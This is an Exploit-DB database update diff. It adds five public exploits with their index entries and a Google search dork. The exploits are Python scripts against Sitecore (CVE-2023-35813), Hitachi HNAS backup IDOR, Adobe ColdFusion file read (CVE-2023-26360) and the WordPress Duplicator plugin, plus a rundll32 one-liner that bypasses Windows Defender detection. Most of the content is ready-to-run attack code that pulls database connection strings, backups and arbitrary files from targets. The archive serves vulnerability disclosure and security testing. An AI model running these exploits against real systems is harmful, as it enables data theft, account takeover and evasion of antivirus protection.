DB: 2024-03-12

7 changes to exploits/shellcodes/ghdb

Sitecore - Remote Code Execution v8.2

Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR

Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read

WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover

Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass

exploits/aspx/webapps/51876.py

@@ -0,0 +1,102 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Sitecore - Remote Code Execution v8.2
+# Exploit Author: abhishek morla
+# Google Dork: N/A
+# Date: 2024-01-08
+# Vendor Homepage: https://www.sitecore.com/
+# Software Link: https://dev.sitecore.net/
+# Version: 10.3
+# Tested on: windows64bit / mozila firefox
+# CVE : CVE-2023-35813
+# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted
+# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09
+# Video POC : https://youtu.be/vWKl9wgdTB0
+
+import argparse
+import requests
+from urllib.parse import quote
+from rich.console import Console
+
+console = Console()
+def initial_test(hostname):
+    # Initial payload to test vulnerability
+    test_payload = '''
+    <%@Register
+        TagPrefix = 'x'
+        Namespace = 'System.Runtime.Remoting.Services'
+        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
+    %>
+    <x:RemotingService runat='server'
+    Context-Response-ContentType='TestVulnerability'
+    />
+    '''
+    encoded_payload = quote(test_payload)
+
+    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
+    headers = {"Content-Type": "application/x-www-form-urlencoded"}
+    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
+
+    response = requests.post(url, headers=headers, data=data, verify=False)
+
+    # Check for the test string in the Content-Type of the response
+    return 'TestVulnerability' in response.headers.get('Content-Type', '')
+
+def get_payload(choice):
+    # Payload templates for different options
+    payloads = {
+        '1': "<%$ ConnectionStrings:core %>",
+        '2': "<%$ ConnectionStrings:master %>",
+        '3': "<%$ ConnectionStrings:web %>"
+    }
+
+    base_payload = '''
+    <%@Register
+        TagPrefix = 'x'
+        Namespace = 'System.Runtime.Remoting.Services'
+        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
+    %>
+    <x:RemotingService runat='server'
+    Context-Response-ContentType='{}'
+    />
+    '''
+
+    return base_payload.format(payloads.get(choice, "Invalid"))
+
+def main(hostname):
+    if initial_test(hostname):
+        print("Exploiting, Please wait...")
+        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")
+        print("Select the payload to use:")
+        print("1: Core connection strings")
+        print("2: Master connection strings")
+        print("3: Web connection strings")
+        payload_choice = input("Enter your choice (1, 2, or 3): ")
+
+        payload = get_payload(payload_choice)
+        encoded_payload = quote(payload)
+
+        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
+        headers = {"Content-Type": "application/x-www-form-urlencoded"}
+        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
+
+        response = requests.post(url, headers=headers, data=data)
+
+        if 'Content-Type' in response.headers:
+            print("Content-Type from the response header:")
+            print("\n")
+            print(response.headers['Content-Type'])
+        else:
+            print("No Content-Type in the response header. Status Code:", response.status_code)
+    else:
+        print("The target does not appear to be vulnerable to CVE-2023-35813.")
+
+
+if __name__ == "__main__":
+    console.print("[bold green]Author: Abhishek Morla[/bold green]")
+    console.print("[bold red]CVE-2023-35813[/bold red]")
+    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')
+    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')
+    args = parser.parse_args()
+
+    main(args.hostname)

exploits/hardware/webapps/51872.py

@@ -0,0 +1,87 @@
+#!/usr/bin/python3
+#
+# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
+# CVE:              CVE-2023-5808
+# Date:             2023-12-13
+# Exploit Author:   Arslan Masood (@arszilla)
+# Vendor:           https://www.hitachivantara.com/
+# Version:          < 14.8.7825.01
+# Tested On:        13.9.7021.04
+
+import argparse
+from datetime import datetime
+from os import getcwd
+
+import requests
+
+parser = argparse.ArgumentParser(
+    description="CVE-2023-5808 PoC",
+    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
+    )
+
+# Create --host argument:
+parser.add_argument(
+    "--host",
+    required=True,
+    type=str,
+    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
+    )
+
+# Create --id argument:
+parser.add_argument(
+    "--id",
+    required=True,
+    type=str,
+    help="JSESSIONID cookie value"
+    )
+
+# Create --sso argument:
+parser.add_argument(
+    "--sso",
+    required=True,
+    type=str,
+    help="JSESSIONIDSSO cookie value"
+    )
+
+args = parser.parse_args()
+
+def download_file(hostname, jsessionid, jsessionidsso):
+    # Set the filename:
+    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"
+
+    # Vulnerable SMU URL:
+    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"
+
+    # GET request cookies
+    smu_cookies = {
+        "JSESSIONID":       jsessionid,
+        "JSESSIONIDSSO":    jsessionidsso
+        }
+
+    # GET request headers:
+    smu_headers = {
+        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
+        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+        "Accept-Language":              "en-US,en;q=0.5",
+        "Accept-Encoding":              "gzip, deflate",
+        "Dnt":                          "1",
+        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
+        "Upgrade-Insecure-Requests":    "1",
+        "Sec-Fetch-Dest":               "document",
+        "Sec-Fetch-Mode":               "navigate",
+        "Sec-Fetch-Site":               "same-origin",
+        "Sec-Fetch-User":               "?1",
+        "Te":                           "trailers",
+        "Connection":                   "close"
+        }
+
+    # Send the request:
+    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
+        with open(filename, 'wb') as backup_archive:
+            # Write the zip file to the CWD:
+            backup_archive.write(file_download.content)
+
+    print(f"{filename} has been downloaded to {getcwd()}")
+
+if __name__ == "__main__":
+    download_file(args.host, args.id, args.sso)

exploits/multiple/webapps/51875.py

@@ -0,0 +1,81 @@
+# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360
+# Google Dork: [not]
+# Date: [12/28/2023]
+# Exploit Author: [Youssef Muhammad]
+# Vendor Homepage: [
+https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
+# Software Link: [
+https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
+# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and
+earlier]
+# Tested on: [Windows, Linux]
+# CVE : [CVE-2023-26360]
+
+import sys
+import requests
+import json
+
+BANNER = """
+   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████
+  ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████
+  ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██
+  ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██
+   ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████
+"""
+
+RED_COLOR = "\033[91m"
+GREEN_COLOR = "\032[42m"
+RESET_COLOR = "\033[0m"
+
+def print_banner():
+    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)
+    return 0
+
+def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
+    if not endpoint.endswith('.cfc'):
+        endpoint += '.cfc'
+
+    if target_file.endswith('.cfc'):
+        raise ValueError('The TARGET_FILE must not point to a .cfc')
+
+    targeted_file = f"a/{target_file}"
+    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})
+
+    vars_get = {'method': 'test', '_cfclient': 'true'}
+    uri = f'{host}{endpoint}'
+
+    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)
+
+    file_data = None
+    splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'
+
+    if response.status_code in [404, 500] and splatter in response.text:
+        file_data = response.text.split(splatter, 1)[0]
+
+    if file_data is None:
+        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')
+
+    print(file_data)
+
+    # Save the output to a file
+    output_file_name = 'output.txt'
+    with open(output_file_name, 'w') as output_file:
+        output_file.write(file_data)
+        print(f"The output saved to {output_file_name}")
+
+if __name__ == "__main__":
+    if not 3 <= len(sys.argv) <= 5:
+        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
+        sys.exit(1)
+
+    print_banner()
+
+    host = sys.argv[1]
+    target_file = sys.argv[2]
+    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"
+    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None
+
+    try:
+        run_exploit(host, target_file, endpoint, proxy_url)
+    except Exception as e:
+        print(f"Error: {e}")

exploits/php/webapps/51874.py

@@ -0,0 +1,99 @@
+# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -
+Unauthenticated Sensitive Data Exposure to Account Takeover
+# Google Dork: inurl:("plugins/duplicator/")
+# Date: 2023-12-04
+# Exploit Author: Dmitrii Ignatyev
+# Vendor Homepage:
+https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
+# Software Link: https://wordpress.org/plugins/duplicator/
+# Version: 1.5.7.1
+# Tested on: Wordpress 6.4
+# CVE : CVE-2023-6114# CVE-Link :
+https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
+
+# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A
+severe vulnerability has been discovered in the directory
+*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only
+exposes extensive information about the site, including its
+configuration, directories, and files, but more critically, it
+provides unauthorized access to sensitive data within the database and
+all data inside. Exploiting this vulnerability poses an imminent
+threat, leading to potential *brute force attacks on password hashes
+and, subsequently, the compromise of the entire system*.*
+POC*:
+
+1) It is necessary that either the administrator or auto-backup works
+automatically at the scheduled time
+
+2) Exploit will send file search requests every 5 seconds
+
+3) I attack the site with this vulnerability using an exploit
+
+Exploit sends a request to the server every 5 seconds along the path
+“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/
+<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if
+it finds something in the index of, it instantly parses all the data
+and displays it on the screen
+
+Exploit (python3):
+
+import requests
+from bs4 import BeautifulSoup
+import re
+import time
+
+url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
+processed_files = set()
+
+def get_file_names(url):
+    response = requests.get(url)
+
+    if response.status_code == 200 and len(response.text) > 0:
+        soup = BeautifulSoup(response.text, 'html.parser')
+        links = soup.find_all('a')
+
+        file_names = []
+        for link in links:
+            file_name = link.get('href')
+            if file_name != "../" and not file_name.startswith("?"):
+                file_names.append(file_name)
+
+        return file_names
+    return []
+
+def get_file_content(url, file_name):
+    file_url = url + file_name
+
+
+    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
+        print(f"Ignoring file: {file_name}")
+        return None
+
+    file_response = requests.get(file_url)
+
+    if file_response.status_code == 200:
+        return file_response.text
+    return None
+
+while True:
+    file_names = get_file_names(url)
+
+    if file_names:
+        print("File names on the page:")
+        for file_name in file_names:
+            if file_name not in processed_files:
+                print(file_name)
+                file_content = get_file_content(url, file_name)
+
+                if file_content is not None:
+                    print("File content:")
+                    print(file_content)
+                    processed_files.add(file_name)
+
+    time.sleep(5)
+
+
+
+--
+With best regards,
+Dmitrii Ignatyev, Penetration Tester

exploits/windows/local/51873.txt

@@ -0,0 +1,71 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows Defender
+
+
+[Vulnerability Type]
+Windows Defender Detection Mitigation Bypass
+TrojanWin32Powessere.G
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Trojan.Win32/Powessere.G / Mitigation Bypass Part 2.
+
+Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
+and attackers will typically get an "Access is denied" error message.
+
+Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.
+However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing.
+
+
+[References]
+https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
+
+
+[Exploit/POC]
+Open command prompt as Administator.
+
+C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
+Access is denied.
+
+C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
+
+Multi-commas, for the Win!
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+February 7, 2024: Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -1842,6 +1842,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,,
 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,,
 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,,
+51876,exploits/aspx/webapps/51876.py,"Sitecore - Remote Code Execution v8.2",2024-03-11,"abhishek morla",webapps,aspx,,2024-03-11,2024-03-11,0,,,,,,
 46987,exploits/aspx/webapps/46987.txt,"Sitecore 8.x - Deserialization Remote Code Execution",2019-06-13,"Jarad Kopf",webapps,aspx,,2019-06-13,2019-06-13,0,CVE-2019-11080,,,,,
 47106,exploits/aspx/webapps/47106.txt,"Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting",2019-07-11,"Owais Mehtab",webapps,aspx,443,2019-07-11,2019-07-11,0,CVE-2019-13493,"Cross-Site Scripting (XSS)",,,,
 41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,,2017-03-15,2017-03-15,0,CVE-2016-8855,,,,,
@@ -4470,6 +4471,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48901,exploits/hardware/webapps/48901.sh,"HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24217,,,,,
 48899,exploits/hardware/webapps/48899.sh,"HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24219,,,,,
 48903,exploits/hardware/webapps/48903.sh,"HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24214,,,,,
+51872,exploits/hardware/webapps/51872.py,"Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR",2024-03-11,"Arslan Masood",webapps,hardware,,2024-03-11,2024-03-11,0,,,,,,
 40158,exploits/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,hardware,80,2016-07-25,2016-07-25,0,,,,,,http://www.search-lab.hu/advisories/secadv-20160720
 38575,exploits/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",webapps,hardware,,2015-10-30,2015-10-30,0,OSVDB-129707,,,,,
 47806,exploits/hardware/webapps/47806.txt,"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting",2019-12-30,LiquidWorm,webapps,hardware,,2019-12-30,2019-12-30,0,,,,,,
@@ -11603,6 +11605,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,,
 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,,
 40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
+51875,exploits/multiple/webapps/51875.py,"Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read",2024-03-11,"Youssef Muhammad",webapps,multiple,,2024-03-11,2024-03-11,0,,,,,,
 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,,
 51327,exploits/multiple/webapps/51327.txt,"Adobe Connect 11.4.5 - Local File Disclosure",2023-04-08,h4shur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-22232,,,,,
 33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple,,2009-08-19,2014-05-05,1,CVE-2009-1879;OSVDB-57340,,,,,https://www.securityfocus.com/bid/36087/info
@@ -33027,6 +33030,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,,2020-12-18,2020-12-18,1,,,,,,
 50992,exploits/php/webapps/50992.txt,"WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download",2022-08-01,SecuriTrust,webapps,php,,2022-08-01,2022-08-01,0,CVE-2022-2551,,,,,
 50993,exploits/php/webapps/50993.txt,"WordPress Plugin Duplicator 1.4.7 - Information Disclosure",2022-08-01,SecuriTrust,webapps,php,,2022-08-01,2023-08-02,1,CVE-2022-2552,,,,,
+51874,exploits/php/webapps/51874.py,"WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover",2024-03-11,"Dmitrii Ignatyev",webapps,php,,2024-03-11,2024-03-11,0,,,,,,
 37162,exploits/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php,,2012-05-15,2015-06-01,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53513/info
 30063,exploits/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",webapps,php,,2013-12-06,2013-12-06,1,,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-111802.png,,
 39553,exploits/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",webapps,php,80,2016-03-11,2016-03-11,0,,"WordPress Plugin",,,,
@@ -40920,6 +40924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,,2019-01-23,2019-01-24,1,,,,,,
 46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,,2019-01-17,2019-01-18,1,,,,,,
 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,,
+51873,exploits/windows/local/51873.txt,"Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass",2024-03-11,hyp3rlinx,local,windows,,2024-03-11,2024-03-11,0,,,,,,
 40562,exploits/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",local,windows,,2016-10-17,2016-10-17,1,CVE-2016-7188;MS16-125,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=887
 41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,,2017-03-16,2017-03-16,0,CVE-2017-0045,,,,,
 40607,exploits/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",local,windows,,2016-10-20,2016-10-21,1,CVE-2016-3387;MS16-118,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=878

ghdb.xml

@@ -117444,6 +117444,18 @@ Felipe Molina</textualDescription>
   <date>2013-11-25</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8423</id>
+  <link>https://www.exploit-db.com/ghdb/8423</link>
+  <category>Vulnerable Servers</category>
+  <shortDescription>inurl:&quot;wa.exe?TICKET&quot;</shortDescription>
+  <textualDescription>inurl:&quot;wa.exe?TICKET&quot;</textualDescription>
+  <query>inurl:&quot;wa.exe?TICKET&quot;</query>
+  <querystring>https://www.google.com/search?q=inurl:&quot;wa.exe?TICKET&quot;</querystring>
+  <edb></edb>
+  <date>2024-03-11</date>
+  <author>Nadir Boulacheb (RubX)</author>
+ </entry>
  <entry>
   <id>3766</id>
   <link>https://www.exploit-db.com/ghdb/3766</link>